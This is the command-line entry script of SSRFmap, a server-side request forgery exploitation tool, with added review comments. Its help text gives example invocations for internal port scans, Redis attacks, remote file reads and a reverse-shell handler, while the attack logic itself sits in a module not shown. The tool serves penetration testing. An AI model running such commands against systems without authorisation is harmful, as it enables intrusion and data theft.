#!/usr/bin/python
from core.ssrf import SSRF
import argparse
import logging
import urllib3
def display_banner():
    """Print the SSRFmap ASCII-art banner to standard output, one row per line."""
    # Raw strings keep the backslashes of the artwork literal.
    banner_rows = (
        r" _____ _________________ ",
        r"/ ___/ ___| ___ \ ___| ",
        r"\ `--.\ `--.| |_/ / |_ _ __ ___ __ _ _ __ ",
        r" `--. \`--. \ /| _| '_ ` _ \ / _` | '_ \ ",
        r"/\__/ /\__/ / |\ \| | | | | | | | (_| | |_) |",
        r"\____/\____/\_| \_\_| |_| |_| |_|\__,_| .__/ ",
        r" | | ",
        r" |_| ",
    )
    for row in banner_rows:
        print(row)
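def parse_args():
    """Build the SSRFmap command-line parser and return the parsed options.

    Arguments are read from ``sys.argv`` by ``argparse``. A request file
    (``-r``) is mandatory in practice: when it is missing the help text is
    printed and the process exits with status 0.

    Returns:
        argparse.Namespace: attributes ``reqfile``, ``param``, ``modules``,
        ``handler``, ``verbose``, ``lhost``, ``lport``, ``ldomain``,
        ``targetfiles``, ``useragent``, ``ssl``, ``proxy`` and ``level``.

    Raises:
        SystemExit: when ``-r`` is not supplied, or when argparse rejects
        the command line.
    """
    example_text = '''Examples:
python ssrfmap.py -r examples/request2.txt -p url -m portscan
python ssrfmap.py -r examples/request.txt -p url -m redis
python ssrfmap.py -r examples/request.txt -p url -m portscan --ssl --uagent "SSRFmapAgent"
python ssrfmap.py -r examples/request.txt -p url -m redis --lhost=127.0.0.1 --lport=4242 -l 4242
python ssrfmap.py -r examples/request.txt -p url -m readfiles --rfiles
'''
    # RawDescriptionHelpFormatter keeps the line breaks of the epilog intact.
    parser = argparse.ArgumentParser(
        epilog=example_text,
        formatter_class=argparse.RawDescriptionHelpFormatter,
    )

    parser.add_argument('-r', action='store', dest='reqfile', help="SSRF Request file")
    parser.add_argument('-p', action='store', dest='param', help="SSRF Parameter to target")
    parser.add_argument('-m', action='store', dest='modules', help="SSRF Modules to enable")
    # `-l` given without a value stores the string '1' (const).
    parser.add_argument('-l', action='store', dest='handler', help="Start an handler for a reverse shell", nargs='?', const='1')
    parser.add_argument('-v', action='store_true', dest='verbose', help="Enable verbosity")

    # No `type=` is set on these three, so argparse stores them as unvalidated
    # strings; whatever consumes them is responsible for checking the format.
    parser.add_argument('--lhost', action='store', dest='lhost', help="LHOST reverse shell or IP to target in the network")
    parser.add_argument('--lport', action='store', dest='lport', help="LPORT reverse shell or port to target in the network")
    parser.add_argument('--ldomain', action='store', dest='ldomain', help="Domain to target for AXFR query or domain related modules")

    # `--rfiles` given without a value stores True (const).
    parser.add_argument('--rfiles', action='store', dest='targetfiles', help="Files to read with readfiles module", nargs='?', const=True)
    parser.add_argument('--uagent', action='store', dest='useragent', help="User Agent to use")
    # Per its help text this switches to HTTPS *without* certificate
    # verification. NOTE(review): responses obtained that way are not
    # authenticated; confirm how the consumer of `ssl` applies it.
    parser.add_argument('--ssl', action='store', dest='ssl', help="Use HTTPS without verification", nargs='?', const=True)
    # The proxy URL is stored as given; it is not validated here.
    parser.add_argument('--proxy', action='store', dest='proxy', help="Use HTTP(s) proxy (ex: http://localhost:8080)")
    # The help text advertises 1-5, but only `type=int` is enforced here;
    # values outside that range are accepted by the parser.
    parser.add_argument('--level', action='store', dest='level', help="Level of test to perform (1-5, default: 1)", nargs='?', const=1, default=1, type=int)

    results = parser.parse_args()

    # Identity test is the correct check for None, and parser.exit() does not
    # depend on the `exit` helper that only the `site` module injects.
    if results.reqfile is None:
        parser.print_help()
        parser.exit()

    return results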
if __name__ == "__main__":
    # Silence urllib3's InsecureRequestWarning (self-signed certificates).
    # This runs before the arguments are parsed, so the warning is suppressed
    # for the whole process whether or not `--ssl` was requested.
    urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

    # Custom logging: everything goes both to the console and to a log file.
    # The file name is relative (created in the current working directory) and
    # mode='w' truncates it on every run.
    # NOTE(review): check what the modules log before sharing this file.
    log_handlers = [
        logging.FileHandler("SSRFmap.log", mode='w'),
        logging.StreamHandler(),
    ]
    logging.basicConfig(
        level=logging.INFO,
        format="[%(levelname)s]:%(message)s",
        handlers=log_handlers,
    )

    # Wrap the WARNING and ERROR level names in ANSI colour escape sequences.
    # The same names are used by both handlers, so the escape sequences are
    # written to SSRFmap.log as well.
    level_templates = (
        (logging.WARNING, "\033[1;31m%s\033[1;0m"),
        (logging.ERROR, "\033[1;41m%s\033[1;0m"),
    )
    for level, template in level_templates:
        logging.addLevelName(level, template % logging.getLevelName(level))

    display_banner()

    # Parse the command line, then handle verbosity: `-v` lowers the root
    # logger threshold from INFO to DEBUG.
    args = parse_args()
    if args.verbose is True:
        root_logger = logging.getLogger()
        root_logger.setLevel(logging.DEBUG)
        logging.debug("Verbose output is enabled")

    # SSRFmap: hand the parsed options to the core class.
    # NOTE(review): what the constructor does is defined in core.ssrf.
    ssrf = SSRF(args)